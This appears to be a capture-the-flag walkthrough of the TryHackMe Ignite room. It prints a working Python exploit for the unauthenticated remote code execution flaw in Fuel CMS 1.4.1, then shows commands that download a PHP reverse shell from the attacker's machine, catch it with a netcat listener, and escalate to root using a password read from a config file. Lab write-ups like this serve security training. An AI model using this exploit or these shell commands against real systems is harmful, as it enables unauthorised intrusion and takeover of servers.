THM Ignite Walkthrough
A new start-up has a few issues with their web server.TryHackMe Room: here
Information Gathering
Let's start with enumerating the THM Ignite Machine by performing a nmap port scan:
sudo nmap -p -1-5000 -sV -sC -v 10.10.
The only port open in the range specified seems to be port 80 with apache httpd 2.4.18 ((Ubuntu)) running on it.
Browsing the website we are greeted with a page that looks like the default page for FUEL CMS.
The CMS itself is located at /fuel and some research showed that the default credentials are admin:admin.
Exploiting Fuel CMS
Using those default credentials we are able to log in as admin into the CMS though this is not necessary as I am going to exploit an Unauthenticated Remote Code Execution vulnerability in Fuel CMS version 1.4.1.
I got some information about the vulnerability at exploit-db and used it to create my own exploit script that gave me a basic "shell".
0import requests
1import urllib.parse
2
3url = 'http://10.10.68.123'
4
5while True:
6 cmd = input('> ')
7 url = url + '/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27' + urllib.parse.quote(cmd) + '%27%29%2b%27'
8 result = (requests.get(url, timeout=5).text)
9 print(result.split('</div>')[1].split('<div')[0].strip())
That script allowed me to execute basic commands like whoami, ls or wget.
Using wget I downloaded a feature-rich PHP reverse shell (pentestmonkey) to the target by starting a local http server:
- Local machine:
python3 -m http.server 8000 - Exploit script:
wget 10.11.27.103:8000/shell.php - Exploit script:
ls
Next, I set up a netcat listener on my attacking machine (nc -lvnp 4545) and browsed shell.php on the webserver.
You can stabilize the reverse shell by creating a TTY shell using python: python3 -c "import pty;pty.spawn('/bin/bash')".
Now we got access to the server as www-data and are able to obtain the user flag.
Privilege Escalation
The privilege escalation for the TryHackMe Ignite room was fairly easy you just have to find the needed piece of information.
After some enumeration I found a file called database.php in /var/www/html/fuel/application/config containing the root password.
All you have to do is type in su and the password and you escalated your privileges to root.
Tags:
TryHackMe, THM, Ignite